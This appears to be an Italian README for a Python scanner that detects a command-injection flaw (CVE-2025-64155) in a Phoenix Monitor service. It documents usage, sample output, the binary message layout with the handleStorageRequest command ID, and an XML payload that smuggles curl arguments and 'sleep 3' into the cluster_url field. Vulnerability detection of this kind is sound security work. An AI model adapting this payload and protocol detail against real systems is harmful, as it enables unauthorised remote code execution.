
CVE-2025-64155-hunter
Uno scanner Python per rilevare la vulnerabilità di command injection (CVE-2025-64155) nel servizio Phoenix Monitor.
CVE-2025-64155 è una vulnerabilità di command injection nel servizio Phoenix Monitor che consente l'esecuzione remota di codice tramite il parametro cluster_url nel comando handleStorageRequest (ID comando: 1075724911).
La vulnerabilità si verifica quando l'input controllato dall'utente nel campo cluster_url viene passato a un comando shell senza una corretta sanitizzazione, consentendo l'iniezione di comandi tramite metacaratteri della shell.
Questo scanner si basa sulla ricerca dell'exploit di Horizon3AI.
python3 scanner.py -t <target_ip>
# Specifica una porta personalizzata
python3 scanner.py -t 192.168.1.100 -p 7900
# Abilita l'output verbose
python3 scanner.py -t 192.168.1.100 -v
# Imposta un timeout personalizzato
python3 scanner.py -t 192.168.1.100 --timeout 15
# Controlla se il servizio è accessibile (nessun test di vulnerabilità)
python3 scanner.py -t 192.168.1.100 --check-only
-t, --target: Indirizzo IP o hostname del target (obbligatorio)-p, --port: Porta del servizio Phoenix Monitor (predefinita: 7900)--timeout: Timeout di connessione in secondi (predefinito: 10)-v, --verbose: Abilita l'output verbose--check-only: Controlla solo se il servizio è accessibileLo scanner utilizza un metodo di rilevamento basato sul tempo:
handleStorageRequest con un payload malevolo contenente sleep 3 nel campo cluster_urlQuesto metodo è sicuro e non distruttivo: non esegue comandi dannosi, solo un innocuo comando sleep a scopo di rilevamento.
[*] CVE-2025-64155 Scanner
[*] Target: 192.168.1.100:7900
[*] Scanning 192.168.1.100:7900 for CVE-2025-64155...
[*] Connecting to 192.168.1.100:7900...
[*] Connected successfully
[*] Sending test payload...
[*] Received response (1024 bytes) in 3.12 seconds
============================================================
[+] VULNERABLE: Target appears to be vulnerable to CVE-2025-64155
[+] Details: Time-based detection: Response delayed by 3.12s (likely command injection)
[*] CVE-2025-64155 Scanner
[*] Target: 192.168.1.100:7900
[*] Scanning 192.168.1.100:7900 for CVE-2025-64155...
[*] Connecting to 192.168.1.100:7900...
[*] Connected successfully
[*] Sending test payload...
[*] Received response (1024 bytes) in 0.45 seconds
============================================================
[-] NOT VULNERABLE: Target does not appear to be vulnerable
[-] Details: Response received quickly (0.45s), likely not vulnerable
Lo scanner invia un messaggio binario con la seguente struttura:
[4 bytes] Message length (156)
[4 bytes] Payload length
[4 bytes] Command ID (1075724911 = 0x4018006F = handleStorageRequest)
[4 bytes] Padding/Flags (0)
[Variable] XML payload
Il payload XML contiene una command injection nel campo cluster_url:
<TEST_STORAGE type="elastic">
<cluster_url>http://10.0.0.1:9200 --next -o /dev/null sleep 3</cluster_url>
...
</TEST_STORAGE>
Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e scopi di ricerca. Utilizza questo strumento solo su sistemi di tua proprietà o per i quali hai esplicito permesso di testare. L'accesso non autorizzato a sistemi informatici è illegale.
Licenza MIT - consulta il file LICENSE per i dettagli.